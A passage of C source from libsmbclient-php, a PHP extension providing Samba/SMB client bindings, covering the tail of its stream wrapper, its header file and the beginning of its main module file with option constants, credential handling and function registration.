return php_stream_alloc(&php_stream_smbio_ops, self, NULL, mode);
}
static int
php_stream_smb_unlink(
php_stream_wrapper *wrapper,
#if PHP_VERSION_ID < 50600
char *url,
#else
const char *url,
#endif
int options,
php_stream_context *context
TSRMLS_DC)
{
php_smbclient_state *state;
smbc_unlink_fn smbc_unlink;
/* Context */
state = php_smb_pool_get(context, url TSRMLS_CC);
if (!state) {
return 0;
}
/* Unlink */
if ((smbc_unlink = smbc_getFunctionUnlink(state->ctx)) == NULL) {
if (options & REPORT_ERRORS) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Unlink not supported");
}
php_smb_pool_drop(state TSRMLS_CC);
return 0;
}
if (smbc_unlink(state->ctx, url) == 0) {
php_smb_pool_drop(state TSRMLS_CC);
return 1;
}
if (options & REPORT_ERRORS) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Unlink fails: %s", strerror(errno));
}
php_smb_pool_drop(state TSRMLS_CC);
return 0;
}
static int
php_stream_smb_mkdir(
php_stream_wrapper *wrapper,
#if PHP_VERSION_ID < 50600
char *url,
#else
const char *url,
#endif
int mode,
int options,
php_stream_context *context
TSRMLS_DC)
{
php_smbclient_state *state;
smbc_mkdir_fn smbc_mkdir;
if (options & PHP_STREAM_MKDIR_RECURSIVE) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Recursive mkdir not supported");
return 0;
}
/* Context */
state = php_smb_pool_get(context, url TSRMLS_CC);
if (!state) {
return 0;
}
/* Mkdir */
if ((smbc_mkdir = smbc_getFunctionMkdir(state->ctx)) == NULL) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mkdir not supported");
php_smb_pool_drop(state TSRMLS_CC);
return 0;
}
if (smbc_mkdir(state->ctx, url, (mode_t)mode) == 0) {
php_smb_pool_drop(state TSRMLS_CC);
return 1;
}
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mkdir fails: %s", strerror(errno));
php_smb_pool_drop(state TSRMLS_CC);
return 0;
}
static int
php_stream_smb_rmdir(
php_stream_wrapper *wrapper,
#if PHP_VERSION_ID < 50600
char *url,
#else
const char *url,
#endif
int options,
php_stream_context *context
TSRMLS_DC)
{
php_smbclient_state *state;
smbc_rmdir_fn smbc_rmdir;
/* Context */
state = php_smb_pool_get(context, url TSRMLS_CC);
if (!state) {
return 0;
}
/* Rmdir */
if ((smbc_rmdir = smbc_getFunctionRmdir(state->ctx)) == NULL) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Rmdir not supported");
php_smb_pool_drop(state TSRMLS_CC);
return 0;
}
if (smbc_rmdir(state->ctx, url) == 0) {
php_smb_pool_drop(state TSRMLS_CC);
return 1;
}
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Rmdir fails: %s", strerror(errno));
php_smb_pool_drop(state TSRMLS_CC);
return 0;
}
static int
php_stream_smb_rename(
php_stream_wrapper *wrapper,
#if PHP_VERSION_ID < 50600
char *url_from,
char *url_to,
#else
const char *url_from,
const char *url_to,
#endif
int options,
php_stream_context *context
TSRMLS_DC)
{
php_smbclient_state *state;
smbc_rename_fn smbc_rename;
/* Context */
state = php_smb_pool_get(context, url_from TSRMLS_CC);
if (!state) {
return 0;
}
if ((smbc_rename = smbc_getFunctionRename(state->ctx)) == NULL) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Rename not supported");
php_smb_pool_drop(state TSRMLS_CC);
return 0;
}
if (smbc_rename(state->ctx, url_from, state->ctx, url_to) == 0) {
php_smb_pool_drop(state TSRMLS_CC);
return 1;
}
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Rename fails: %s", strerror(errno));
php_smb_pool_drop(state TSRMLS_CC);
return 0;
}
static int php_smbdir_ops_close(php_stream *stream, int close_handle TSRMLS_DC)
{
smbc_closedir_fn smbc_closedir;
STREAM_DATA_FROM_STREAM();
if (close_handle) {
if (self->handle) {
smbc_closedir = smbc_getFunctionClosedir(self->state->ctx);
if (smbc_closedir) {
smbc_closedir(self->state->ctx, self->handle);
}
self->handle = NULL;
}
}
php_smb_pool_drop(self->state TSRMLS_CC);
efree(self);
stream->abstract = NULL;
return EOF;
}
#if PHP_VERSION_ID < 70400
static size_t php_smbdir_ops_read(php_stream *stream, char *buf, size_t count TSRMLS_DC)
#else
static ssize_t php_smbdir_ops_read(php_stream *stream, char *buf, size_t count TSRMLS_DC)
#endif
{
struct smbc_dirent *dirent;
php_stream_dirent *ent = (php_stream_dirent*)buf;
STREAM_DATA_FROM_STREAM();
if (!self || !self->handle) {
return 0;
}
/* avoid problems if someone mis-uses the stream */
if (count != sizeof(php_stream_dirent)) {
return 0;
}
if (!self->smbc_readdir) {
self->smbc_readdir = smbc_getFunctionReaddir(self->state->ctx);
}
if (self->smbc_readdir) {
if ((dirent = self->smbc_readdir(self->state->ctx, self->handle)) != NULL) {
PHP_STRLCPY(ent->d_name, dirent->name, sizeof(ent->d_name), dirent->namelen);
return sizeof(php_stream_dirent);
}
}
stream->eof = 1;
return 0;
}
static php_stream_ops php_stream_smbdir_ops = {
NULL,
php_smbdir_ops_read,
php_smbdir_ops_close,
NULL,
"smbdir",
NULL, /* rewind */
NULL, /* cast */
NULL, /* stat */
NULL /* set_option */
};
static php_stream *
php_stream_smbdir_opener(
php_stream_wrapper *wrapper,
#if PHP_VERSION_ID < 50600
char *path,
char *mode,
#else
const char *path,
const char *mode,
#endif
int options,
#if PHP_MAJOR_VERSION < 7
char **opened_path,
#else
zend_string **opened_path,
#endif
php_stream_context *context
STREAMS_DC TSRMLS_DC)
{
php_smbclient_state *state;
smbc_opendir_fn smbc_opendir;
SMBCFILE *handle;
php_smb_stream_data *self;
/* Context */
state = php_smb_pool_get(context, path TSRMLS_CC);
if (!state) {
return NULL;
}
/* Directory */
if ((smbc_opendir = smbc_getFunctionOpendir(state->ctx)) == NULL) {
php_smb_pool_drop(state TSRMLS_CC);
return NULL;
}
if ((handle = smbc_opendir(state->ctx, path)) == NULL) {
php_smb_pool_drop(state TSRMLS_CC);
return NULL;
}
self = ecalloc(sizeof(*self), 1);
self->state = state;
self->handle = handle;
return php_stream_alloc(&php_stream_smbdir_ops, self, NULL, mode);
}
static int
php_stream_smb_stat(
php_stream_wrapper *wrapper,
#if PHP_VERSION_ID < 50600
char *url,
#else
const char *url,
#endif
int flags,
php_stream_statbuf *ssb,
php_stream_context *context
TSRMLS_DC)
{
php_smbclient_state *state;
smbc_stat_fn smbc_stat;
/* Context */
state = php_smb_pool_get(context, url TSRMLS_CC);
if (!state) {
return 0;
}
/* Stat */
if ((smbc_stat = smbc_getFunctionStat(state->ctx)) == NULL) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Stat not supported");
php_smb_pool_drop(state TSRMLS_CC);
return -1;
}
if (smbc_stat(state->ctx, url, &ssb->sb) >= 0) {
php_smb_pool_drop(state TSRMLS_CC);
return 0;
}
/* Don't display an error, as PHP uses this method internally to check whether a file exists */
php_smb_pool_drop(state TSRMLS_CC);
return -1;
}
#if PHP_VERSION_ID >= 50400
static int
php_stream_smb_metadata(
php_stream_wrapper *wrapper,
#if PHP_VERSION_ID < 50600
char *url,
#else
const char *url,
#endif
int option,
void *value,
php_stream_context *context
TSRMLS_DC)
{
php_smbclient_state *state;
smbc_chmod_fn smbc_chmod;
smbc_open_fn smbc_open;
smbc_utimes_fn smbc_utimes;
smbc_close_fn smbc_close;
mode_t mode;
struct utimbuf *newtime;
struct timeval times[2];
SMBCFILE *handle;
int ret = 0;
switch(option) {
case PHP_STREAM_META_TOUCH:
newtime = (struct utimbuf *)value;
/* Context */
state = php_smb_pool_get(context, url TSRMLS_CC);
if (!state) {
return 0;
}
/* Create + Utimes */
if ((smbc_open = smbc_getFunctionOpen(state->ctx)) == NULL
|| (smbc_close = smbc_getFunctionClose(state->ctx)) == NULL
|| (smbc_utimes = smbc_getFunctionUtimes(state->ctx)) == NULL) {
ret = -1;
break;
}
/* Create can fail if file exists, ignore result */
handle = smbc_open(state->ctx, url, O_EXCL|O_CREAT, 0666);
if (handle) {
smbc_close(state->ctx, handle);
}
if (newtime) {
times[0].tv_usec = 0;
times[0].tv_sec = newtime->actime;
times[1].tv_usec = 0;
times[1].tv_sec = newtime->modtime;
ret = smbc_utimes(state->ctx, url, times);
}
break;
case PHP_STREAM_META_ACCESS:
mode = (mode_t)*(long *)value;
/* Context */
state = php_smb_pool_get(context, url TSRMLS_CC);
if (!state) {
return 0;
}
/* Chmod */
if ((smbc_chmod = smbc_getFunctionChmod(state->ctx)) == NULL) {
ret = -1;
break;
}
ret = smbc_chmod(state->ctx, url, (mode_t)mode);
break;
default:
php_error_docref1(NULL TSRMLS_CC, url, E_WARNING, "Unknown option %d for stream_metadata", option);
return 0;
}
php_smb_pool_drop(state TSRMLS_CC);
if (ret == -1) {
php_error_docref1(NULL TSRMLS_CC, url, E_WARNING, "Operation failed: %s", strerror(errno));
return 0;
}
php_clear_stat_cache(0, NULL, 0 TSRMLS_CC);
return 1;
}
#endif
static php_stream_wrapper_ops smb_stream_wops = {
php_stream_smb_opener,
NULL, /* close */
NULL, /* fstat */
php_stream_smb_stat,
php_stream_smbdir_opener,
"smb",
php_stream_smb_unlink,
php_stream_smb_rename,
php_stream_smb_mkdir,
php_stream_smb_rmdir
#if PHP_VERSION_ID >= 50400
, php_stream_smb_metadata
#endif
};
php_stream_wrapper php_stream_smb_wrapper = {
&smb_stream_wops,
NULL,
1 /* is_url */
};
<|start_filename|>php_smbclient.h<|end_filename|>
/* ------------------------------------------------------------------
* This file is part of libsmbclient-php: Samba bindings for PHP.
* Libsmbclient-php is licensed under the BSD 2-clause license:
* ------------------------------------------------------------------
*
* Copyright (c) 2003, <NAME>
* 2009 - 2014, <NAME>
* 2013 - 2015, <NAME>
* 2015, <NAME>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following
* disclaimer in the documentation and/or other materials provided
* with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
* CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
* BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
* TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
* ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
* THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* ------------------------------------------------------------------
*/
#ifndef PHP_SMBCLIENT_H
#define PHP_SMBCLIENT_H
#include <libsmbclient.h>
#define PHP_SMBCLIENT_VERSION "1.0.6"
extern zend_module_entry smbclient_module_entry;
#define phpext_smbclient_ptr &smbclient_module_entry
typedef struct _php_smbclient_state
{
SMBCCTX *ctx;
char *wrkg;
char *user;
char *pass;
int wrkglen;
int userlen;
int passlen;
int err;
}
php_smbclient_state;
struct _php_smb_pool {
unsigned char hash[20];
php_smbclient_state *state;
struct _php_smb_pool *next;
int nb;
};
ZEND_BEGIN_MODULE_GLOBALS(smbclient)
struct _php_smb_pool *pool_first;
ZEND_END_MODULE_GLOBALS(smbclient)
extern ZEND_DECLARE_MODULE_GLOBALS(smbclient)
PHP_MINIT_FUNCTION(smbclient);
PHP_MSHUTDOWN_FUNCTION(smbclient);
PHP_RSHUTDOWN_FUNCTION(smbclient);
PHP_RINIT_FUNCTION(smbclient);
PHP_MINFO_FUNCTION(smbclient);
PHP_GINIT_FUNCTION(smbclient);
PHP_FUNCTION(smbclient_version);
PHP_FUNCTION(smbclient_library_version);
PHP_FUNCTION(smbclient_state_new);
PHP_FUNCTION(smbclient_state_init);
PHP_FUNCTION(smbclient_state_errno);
PHP_FUNCTION(smbclient_state_free);
PHP_FUNCTION(smbclient_option_get);
PHP_FUNCTION(smbclient_option_set);
PHP_FUNCTION(smbclient_client_protocols);
PHP_FUNCTION(smbclient_opendir);
PHP_FUNCTION(smbclient_readdir);
PHP_FUNCTION(smbclient_closedir);
PHP_FUNCTION(smbclient_rename);
PHP_FUNCTION(smbclient_unlink);
PHP_FUNCTION(smbclient_mkdir);
PHP_FUNCTION(smbclient_rmdir);
PHP_FUNCTION(smbclient_stat);
PHP_FUNCTION(smbclient_fstat);
PHP_FUNCTION(smbclient_open);
PHP_FUNCTION(smbclient_creat);
PHP_FUNCTION(smbclient_read);
PHP_FUNCTION(smbclient_write);
PHP_FUNCTION(smbclient_lseek);
PHP_FUNCTION(smbclient_ftruncate);
PHP_FUNCTION(smbclient_close);
PHP_FUNCTION(smbclient_chmod);
PHP_FUNCTION(smbclient_utimes);
PHP_FUNCTION(smbclient_listxattr);
PHP_FUNCTION(smbclient_getxattr);
PHP_FUNCTION(smbclient_setxattr);
PHP_FUNCTION(smbclient_removexattr);
PHP_FUNCTION(smbclient_statvfs);
PHP_FUNCTION(smbclient_fstatvfs);
/* If Zend Thread Safety (ZTS) is defined, each thread gets its own private
* php_smbclient_globals structure, the elements of which it can access
* through the SMBCLIENT_G() macro. Without ZTS, there is just one master
* structure in which we access the members directly: */
#if PHP_MAJOR_VERSION >= 7
#define SMBCLIENT_G(v) ZEND_MODULE_GLOBALS_ACCESSOR(smbclient, v)
#else
#ifdef ZTS
#define SMBCLIENT_G(v) TSRMG(smbclient_globals_id, zend_smbclient_globals *, v)
#else
#define SMBCLIENT_G(v) (smbclient_globals.v)
#endif
#endif
#if PHP_MAJOR_VERSION >= 8
#define TSRMLS_D void
#define TSRMLS_DC
#define TSRMLS_C
#define TSRMLS_CC
#define TSRMLS_FETCH()
#endif
extern php_stream_wrapper php_stream_smb_wrapper;
php_smbclient_state * php_smbclient_state_new (php_stream_context *context, int init TSRMLS_DC);
void php_smbclient_state_free (php_smbclient_state *state TSRMLS_DC);
int php_smbclient_state_init (php_smbclient_state *state TSRMLS_DC);
int flagstring_to_smbflags (const char *flags, int flags_len, int *retval TSRMLS_DC);
void php_smb_pool_cleanup(TSRMLS_D);
#endif /* PHP_SMBCLIENT_H */
<|start_filename|>smbclient.c<|end_filename|>
/* ------------------------------------------------------------------
* This file is part of libsmbclient-php: Samba bindings for PHP.
* Libsmbclient-php is licensed under the BSD 2-clause license:
* ------------------------------------------------------------------
*
* Copyright (c) 2003, <NAME>
* 2009 - 2014, <NAME>
* 2013 - 2015, <NAME>
* 2015, <NAME>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following
* disclaimer in the documentation and/or other materials provided
* with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
* CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
* BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
* TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
* ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
* THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* ------------------------------------------------------------------
*/
#define IS_EXT_MODULE
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#include "php.h"
#include "ext/standard/info.h"
#include "php_smbclient.h"
ZEND_DECLARE_MODULE_GLOBALS(smbclient)
#define PHP_SMBCLIENT_STATE_NAME "smbclient state"
#define PHP_SMBCLIENT_FILE_NAME "smbclient file"
static int le_smbclient_state;
static int le_smbclient_file;
#if PHP_MAJOR_VERSION >= 7
typedef size_t strsize_t;
#else
typedef int strsize_t;
typedef long zend_long;
#endif
enum {
SMBCLIENT_OPT_OPEN_SHAREMODE = 1,
SMBCLIENT_OPT_ENCRYPT_LEVEL = 2,
SMBCLIENT_OPT_CASE_SENSITIVE = 3,
SMBCLIENT_OPT_BROWSE_MAX_LMB_COUNT = 4,
SMBCLIENT_OPT_URLENCODE_READDIR_ENTRIES = 5,
/* Ignore OneSharePerServer, not relevant to us. */
SMBCLIENT_OPT_USE_KERBEROS = 6,
SMBCLIENT_OPT_FALLBACK_AFTER_KERBEROS = 7,
/* Reverse the sense of this option, the original
* is the confusing "NoAutoAnonymousLogin": */
SMBCLIENT_OPT_AUTO_ANONYMOUS_LOGIN = 8,
SMBCLIENT_OPT_USE_CCACHE = 9,
SMBCLIENT_OPT_USE_NT_HASH = 10,
SMBCLIENT_OPT_NETBIOS_NAME = 11,
SMBCLIENT_OPT_WORKGROUP = 12,
SMBCLIENT_OPT_USER = 13,
SMBCLIENT_OPT_PORT = 14,
SMBCLIENT_OPT_TIMEOUT = 15,
}
php_smbclient_options;
static char *
find_char (char *start, char *last, char q)
{
char *c;
for (c = start; c <= last; c++) {
if (*c == q) {
return c;
}
}
return NULL;
}
static char *
find_second_char (char *start, char *last, char q)
{
char *c;
if ((c = find_char(start, last, q)) == NULL) {
return NULL;
}
return find_char(c + 1, last, q);
}
static void
astfill (char *start, char *last)
{
char *c;
for (c = start; c <= last; c++) {
*c = '*';
}
}
static void
hide_password (char *url, int len)
{
/* URL should have the form:
* smb://[[[domain;]user[:password@]]server[/share[/path[/file]]]]
* Replace everything after the second colon and before the next @
* with asterisks. */
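/* Example: "smb://dom;user:secret@host/share" becomes
 * "smb://dom;user:******@host/share". */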
char *last = (url + len) - 1;
char *second_colon;
char *slash;
char *at_sign;
if (len <= 0) {
return;
}
if ((second_colon = find_second_char(url, last, ':')) == NULL) {
return;
}
if ((slash = find_char(second_colon + 1, last, '/')) == NULL) {
slash = last + 1;
}
if ((at_sign = find_char(second_colon + 1, last, '@')) == NULL) {
astfill(second_colon + 1, slash - 1);
return;
}
if (at_sign > slash) {
at_sign = slash;
}
astfill(second_colon + 1, at_sign - 1);
}
/* {{{ arginfo */
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_void, 0)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_smbclient_state_init, 0, 0, 1)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, workgroup)
ZEND_ARG_INFO(0, user)
ZEND_ARG_INFO(0, password)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_state, 0)
ZEND_ARG_INFO(0, state)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_option_get, 0)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, option)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_option_set, 0)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, option)
ZEND_ARG_INFO(0, value)
ZEND_END_ARG_INFO()
#if HAVE_SMBC_SETOPTIONPROTOCOLS
ZEND_BEGIN_ARG_INFO_EX(arginfo_smbclient_client_protocols, 0, 0, 1)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, minproto)
ZEND_ARG_INFO(0, maxproto)
ZEND_END_ARG_INFO()
#endif
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_path, 0)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, path)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_rename, 0)
ZEND_ARG_INFO(0, oldstate)
ZEND_ARG_INFO(0, oldpath)
ZEND_ARG_INFO(0, newstate)
ZEND_ARG_INFO(0, newpath)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_dir, 0)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, dir)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_file, 0)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, file)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_read, 0)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, file)
ZEND_ARG_INFO(0, count)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_smbclient_open, 0, 0, 3)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, path)
ZEND_ARG_INFO(0, flags)
ZEND_ARG_INFO(0, mode)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_smbclient_creat, 0, 0, 2)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, path)
ZEND_ARG_INFO(0, mode)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_smbclient_write, 0, 0, 3)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, file)
ZEND_ARG_INFO(0, buffer)
ZEND_ARG_INFO(0, count)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_lseek, 0)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, file)
ZEND_ARG_INFO(0, offset)
ZEND_ARG_INFO(0, whence)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_ftruncate, 0)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, file)
ZEND_ARG_INFO(0, offset)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_utimes, 0)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, path)
ZEND_ARG_INFO(0, mtime)
ZEND_ARG_INFO(0, atime)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_getxattr, 0)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, path)
ZEND_ARG_INFO(0, name)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_smbclient_setxattr, 0, 0, 4)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, path)
ZEND_ARG_INFO(0, name)
ZEND_ARG_INFO(0, value)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
/* }}} */
static zend_function_entry smbclient_functions[] =
{
PHP_FE(smbclient_version, arginfo_smbclient_void)
PHP_FE(smbclient_library_version, arginfo_smbclient_void)
PHP_FE(smbclient_state_new, arginfo_smbclient_void)
PHP_FE(smbclient_state_init, arginfo_smbclient_state_init)
PHP_FE(smbclient_state_errno, arginfo_smbclient_state)
PHP_FE(smbclient_state_free, arginfo_smbclient_state)
PHP_FE(smbclient_option_get, arginfo_smbclient_option_get)
PHP_FE(smbclient_option_set, arginfo_smbclient_option_set)
#if HAVE_SMBC_SETOPTIONPROTOCOLS
PHP_FE(smbclient_client_protocols, arginfo_smbclient_client_protocols)
#endif
PHP_FE(smbclient_opendir, arginfo_smbclient_path)
PHP_FE(smbclient_readdir, arginfo_smbclient_dir)
PHP_FE(smbclient_closedir, arginfo_smbclient_dir)
PHP_FE(smbclient_stat, arginfo_smbclient_path)
PHP_FE(smbclient_fstat, arginfo_smbclient_file)
PHP_FE(smbclient_open, arginfo_smbclient_open)
PHP_FE(smbclient_creat, arginfo_smbclient_creat)
PHP_FE(smbclient_read, arginfo_smbclient_read)
PHP_FE(smbclient_close, arginfo_smbclient_file)
PHP_FE(smbclient_mkdir, arginfo_smbclient_creat)
PHP_FE(smbclient_rmdir, arginfo_smbclient_path)
PHP_FE(smbclient_rename, arginfo_smbclient_rename)
PHP_FE(smbclient_write, arginfo_smbclient_write)
PHP_FE(smbclient_unlink, arginfo_smbclient_path)
PHP_FE(smbclient_lseek, arginfo_smbclient_lseek)
PHP_FE(smbclient_ftruncate, arginfo_smbclient_ftruncate)
PHP_FE(smbclient_chmod, arginfo_smbclient_creat)
PHP_FE(smbclient_utimes, arginfo_smbclient_utimes)
PHP_FE(smbclient_listxattr, arginfo_smbclient_path)
PHP_FE(smbclient_getxattr, arginfo_smbclient_getxattr)
PHP_FE(smbclient_setxattr, arginfo_smbclient_setxattr)
PHP_FE(smbclient_removexattr, arginfo_smbclient_getxattr)
PHP_FE(smbclient_statvfs, arginfo_smbclient_path)
PHP_FE(smbclient_fstatvfs, arginfo_smbclient_file)
#ifdef PHP_FE_END
PHP_FE_END
#else
{NULL, NULL, NULL}
#endif
};
zend_module_entry smbclient_module_entry =
{ STANDARD_MODULE_HEADER
, "smbclient" /* name */
, smbclient_functions /* functions */
, PHP_MINIT(smbclient) /* module_startup_func */
, PHP_MSHUTDOWN(smbclient) /* module_shutdown_func */
, PHP_RINIT(smbclient) /* request_startup_func */
, PHP_RSHUTDOWN(smbclient) /* request_shutdown_func */
, PHP_MINFO(smbclient) /* info_func */
, PHP_SMBCLIENT_VERSION /* version */
, PHP_MODULE_GLOBALS(smbclient)
, PHP_GINIT(smbclient) /* globals ctor */
, NULL /* globals dtor */
, NULL /* post_deactivate_func */
, STANDARD_MODULE_PROPERTIES_EX
} ;
zend_module_entry old_module_entry = {
STANDARD_MODULE_HEADER,
"libsmbclient",
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
PHP_SMBCLIENT_VERSION,
STANDARD_MODULE_PROPERTIES,
};
#ifdef COMPILE_DL_SMBCLIENT
ZEND_GET_MODULE(smbclient)
#endif
static void
auth_copy (char *dst, char *src, size_t srclen, size_t maxlen)
{
if (dst == NULL || maxlen == 0) {
return;
}
if (src == NULL || srclen == 0) {
*dst = '\0';
return;
}
if (srclen < maxlen) {
memcpy(dst, src, srclen);
dst[srclen] = '\0';
return;
}
memcpy(dst, src, maxlen - 1);
dst[maxlen - 1] = '\0';
}
static void
smbclient_auth_func (SMBCCTX *ctx, const char *server, const char *share, char *wrkg, int wrkglen, char *user, int userlen, char *pass, int passlen)
{
/* Given context, server and share, return workgroup, username and password.
* String lengths are the max allowable lengths. */
php_smbclient_state *state;
if (ctx == NULL || (state = smbc_getOptionUserData(ctx)) == NULL) {
return;
}
auth_copy(wrkg, state->wrkg, (size_t)state->wrkglen, (size_t)wrkglen);
auth_copy(user, state->user, (size_t)state->userlen, (size_t)userlen);
auth_copy(pass, state->pass, (size_t)state->passlen, (size_t)passlen);
}
void
php_smbclient_state_free (php_smbclient_state *state TSRMLS_DC)
{
/* TODO: if smbc_free_context() fails (returns nonzero), PHP leaks the underlying handle: */
if (state->ctx != NULL && smbc_free_context(state->ctx, 1) != 0) {
switch (errno) {
case EBUSY: php_error(E_WARNING, "Couldn't destroy SMB context: connection in use"); break;
case EBADF: php_error(E_WARNING, "Couldn't destroy SMB context: invalid handle"); break;
default: php_error(E_WARNING, "Couldn't destroy SMB context: unknown error (%d)", errno); break;
}
}
if (state->wrkg != NULL) {
memset(state->wrkg, 0, state->wrkglen);
efree(state->wrkg);
}
if (state->user != NULL) {
memset(state->user, 0, state->userlen);
efree(state->user);
}
if (state->pass != NULL) {
memset(state->pass, 0, state->passlen);
efree(state->pass);
}
efree(state);
}
static inline void
smbclient_state_dtor (
#if PHP_MAJOR_VERSION >= 7
zend_resource *rsrc
#else
zend_rsrc_list_entry *rsrc
#endif
TSRMLS_DC)
{
php_smbclient_state_free((php_smbclient_state *)rsrc->ptr TSRMLS_CC);
}
static void
smbclient_file_dtor (
#if PHP_VERSION_ID >= 70000
zend_resource *rsrc
#else
zend_rsrc_list_entry *rsrc
#endif
TSRMLS_DC)
{
/* Because libsmbclient's file/dir close functions require a pointer to
* a context which we don't have, we cannot reliably destroy a file
* resource. One way of obtaining the context pointer could be to save
* it in a structure along with the file context, but the pointer could
* grow stale or otherwise spark a race condition. So it seems that the
* best we can do is nothing. The PHP programmer can either manually
* free the file resources, or wait for them to be cleaned up when the
* associated context is destroyed. */
}
PHP_GINIT_FUNCTION(smbclient)
{
smbclient_globals->pool_first = NULL;
}
PHP_MINIT_FUNCTION(smbclient)
{
/* Constants for smbclient_setxattr: */
REGISTER_LONG_CONSTANT("SMBCLIENT_XATTR_CREATE", SMBC_XATTR_FLAG_CREATE, CONST_PERSISTENT | CONST_CS);
REGISTER_LONG_CONSTANT("SMBCLIENT_XATTR_REPLACE", SMBC_XATTR_FLAG_REPLACE, CONST_PERSISTENT | CONST_CS);
/* Constants for getting/setting options: */
#define SMBCLIENT_CONST(x) REGISTER_LONG_CONSTANT(#x, x, CONST_PERSISTENT | CONST_CS);
SMBCLIENT_CONST(SMBCLIENT_OPT_OPEN_SHAREMODE);
SMBCLIENT_CONST(SMBCLIENT_OPT_ENCRYPT_LEVEL);
